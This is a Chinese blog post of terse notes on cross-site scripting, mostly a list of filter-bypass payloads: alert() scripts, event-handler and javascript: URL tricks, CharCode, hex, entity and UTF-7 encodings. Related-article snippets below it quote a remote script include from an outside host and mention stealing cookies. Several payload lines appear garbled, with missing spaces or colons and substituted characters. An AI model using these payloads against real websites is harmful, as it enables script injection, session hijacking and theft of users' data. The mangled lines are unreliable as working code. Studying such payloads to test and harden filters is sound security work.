xss

最新推荐文章于 2024-05-04 20:20:27 发布
最新推荐文章于 2024-05-04 20:20:27 发布
阅读量673 收藏 1
点赞数
分类专栏: vague
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012329314/article/details/71544205
版权




[http://www.baidu.com]


www.google.com\abc

parse \ to / 

www.google.com?abc

transfer to www/?abc


DOM    construct payload  make ' ' pair  // annotate  

interaction  xss worm  

<div style="background:url('javascript:alert("22")')"></div>

<!-- -->

<base>
event  onclick etc

eval function

eval(alert("dd"))



location.hash.substr(1) just from #  

www.g.com/a.php#alert(1)


<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41, 59)</script>


<script>alert(“xss”);</script>  to hex  


%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%78%73%73%22%29%3b%3c%2f%73%63%72%69%70%74%3e

<BODY οnlοad="alert('XSS')">


<IMG SRC=""οnerrοr="alert('XSS')">

过滤了双引号和 <script>:
<IMGSRC=javascriptalert(&quot;XSS&quot;)>


使用 CharCode 绕过过滤 :
<IMGSRC=javascriptalert(String.fromCharCode(88,83,83))> <IMGSRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#10
1;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>


使用 Ascii 表你可以自己试试。当然转换成 16 进制也是可以的。。

<IMGSRC=&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C
;&#x65;&#x72;&#x74;&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;>



<LINKREL="stylesheet"HREF="javascript alert('XSS');">   low  verison of ie


<IMGSRC=`javascript alert("Lookits, 'XSS'")`>


使用 UTF-7 编码后 :
+ADw-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4-
 

bat执行有双引号的命令行_一些BAT的XSS实例(二)进阶篇
weixin_35034536的博客
12-09 785
很多朋友私信我,想看XSS绕过实例分析,所以我选了10个BAT的XSS实例来聊聊构造和绕过思路。以下为10道题目(弹框1就算成功,大部分的题都是一题多解,尽量给出多种思路,或者最短的解法。)http://px1624.sinaapp.com/test/xsstest1/http://px1624.sinaapp.com/test/xsstest2/http://px1624.sinaap...
XSS
03-13
XSS,全称为“跨站脚本攻击”(Cross-Site Scripting),是网络安全领域中常见的一种攻击方式,主要用于窃取用户的敏感信息,如cookies、会话令牌等。这种攻击通常发生在Web应用中,攻击者通过注入恶意脚本,使得...
XSS过滤绕过
qq_39654116的博客
01-17 5480
目录过滤测试示例输入在script标签中非常规的事件监听HREF内容可控变换JavaScript变换Vbscript变换输入在属性里JSONSVG标签浏览器bug常见标签利用link远程包含js文件javascript伪协议属性payload常用的payload各种alert伪协议Chrome XSS auditor bypass长度限制jquery sourceMappingURL图片名过期的payloadcssmarkdowniframeformmeta绕过过滤空格大小写混淆双写绕过字符拼接编码绕过编码
XSS 绕过常用语句
Mr.Huang_的博客
09-16 3149
XSS 绕过常用语句 写在最前面::: 下文中 alert 都可以由 prompt 代替 最常用的 XSS 漏洞测试代码: <script>prompt("XSS")</script> <SCRIPT SRC=http://damit5.ml/xss.js></SCRIPT> 在输入(Input)标签里 <INPUT type="text" value='<SCRIPT>alert("XSS")</SCRIPT>'>
XSS绕过单引号限制
Vicl1fe的博客
04-20 4395
前言 一个朋友突然问我xss闯关第三关如何反弹cookie。自己研究了一下确实不是太简单。记个笔记在此。 有网上在线的xss闯关。也可以去下载一下 第三关 xss在出现在keyword参数上。用的是单引号闭合的。 看源码可以看到用什么闭合的。但是你f12看的时候是双引号,实际是单引号。所以我觉得这里还是要猜一下。也好猜。不是单引号就是双引号了。 看下图。 1、这个靶场似乎没有cookie。我自己...
关于pdf文件xss攻击问题,配置xssFilter方法
12-21
PDF文件XSS攻击问题主要指的是攻击者通过构造恶意的PDF文档,利用其中的脚本语言功能,尝试在用户的浏览器上执行跨站脚本攻击(XSS)。这种攻击方式可能导致敏感信息泄露、用户权限滥用或其他安全风险。在SpringBoot...
xss特殊字符拦截与过滤
04-01
XSS攻击是指攻击者通过在Web页面插入恶意脚本代码,当其他用户浏览这些页面时,嵌入其中的脚本就会执行,从而盗取用户信息或者篡改网页。本篇代码展示了如何通过编程手段拦截和过滤这些危险代码,保障Web应用程序的...
免费蓝莲花Bluelotus,XSS工具网安
08-14
【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】...
XSS漏洞攻击与防护源代码
10-31
XSS(Cross-site scripting)是一种常见的网络安全漏洞,它允许攻击者在受害者的浏览器上执行恶意脚本。这种攻击通常发生在Web应用中,攻击者通过注入恶意脚本到网页上,当用户浏览这些被篡改的页面时,恶意脚本会在...
XSS绕过总结
qq_42990434的博客
05-29 1万+
有时候明明有一个xss漏洞,但是却有xss过滤规则或者WAF保护导致我们不能成功的利用,这些会屏蔽掉我们的代码,会导致我们执行完代码之后什么反应都没有,这时候我们可以审查一下元素,看看我们的代码有没有替换为空,或者替换成其他东西,或者那些符号被过滤掉了。 比如:我们输入<script> alert(“hi”) </scrip>, 会被转换成<script> alert(>xss detected<) </scrip>,这样的话我们的js语句就不生效
Xss漏洞常见绕过过滤攻击场景
最新发布
chaottop的博客
05-04 2570
在某些情况下,后台作的过滤非常简单,只对一些特殊的字符串作黑名单过滤,导致可直接通过字母大小写绕过后台的过滤。如下例子
xss过滤总结
weixin_42109829的博客
12-04 3448
一。简述 一。简述 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序. 例如: 1.盗用cookie,获取敏感信息。 2.利用植入Flash,通过crossdomain权限设置进一步获取更高权限;或者利用Java等得到类似的操作。 3.利用iframe、frame、XMLHttpRequest或上述Flash等方式,以...
45. XSS篇——XSS过滤绕过技巧
Fly_鹏程万里
03-20 2万+
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 改变大小写 在测试过程中,我们可以改变测试语句的大小写来绕过XSS规则: 比如:<script>alert(“xss”);</script>可以...
xss插入代码和绕过过滤
刘正阳的专栏
11-10 2478
代码插入方式   由于插入的脚本为js或者是vbs,所有一般需要由的关键字JavaScript、VbScript、expression比 如XSS');">,但当接收鼠标或键盘响应时,这三个关键字可以省略掉,所以有以下利用方法<img onmouseover="alert('XSS')">或者XSS');">等等。而且由于html并 不遵循xhtml的标准,所以可以有以下插入方式:
XSS绕过技术
热门推荐
suifengshiyu的专栏
03-27 2万+
本文转载自:http://www.2cto.com/Article/201211/168950.html Cross-SiteScripting(XSS)是一类出现在web应用程序上的安全弱点,攻击者可以通过XSS插入一些代码,使得访问页面的其他用户都可以看到,XSS通常是可以被看作漏洞的。它允许攻击者绕过安全机制,通过尝试各种不同的方法插入恶意代码,攻击者可以得到敏感页面的权限,会话,co
渗透测试-xss绕过和htmlspecialchars函数绕过
lza20001103的博客
04-24 4962
xss绕过和htmlspecialchars函数绕过
xss过滤绕过方法总结
jinhezhai的博客
09-15 1万+
xss注入常用语句、 1.<script>alert(1)</script> 2.<img src="#" onmouseover="alert(11)"> 3.<img src="#" onerror="alert('xss')"> 4.<svg onload=alert(1)> 5.<a href=javascript:alert(1)> 1.尝试双写绕过 2.大小写绕过、 3.js编码#unicode js的一种编码方式。 4.h
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值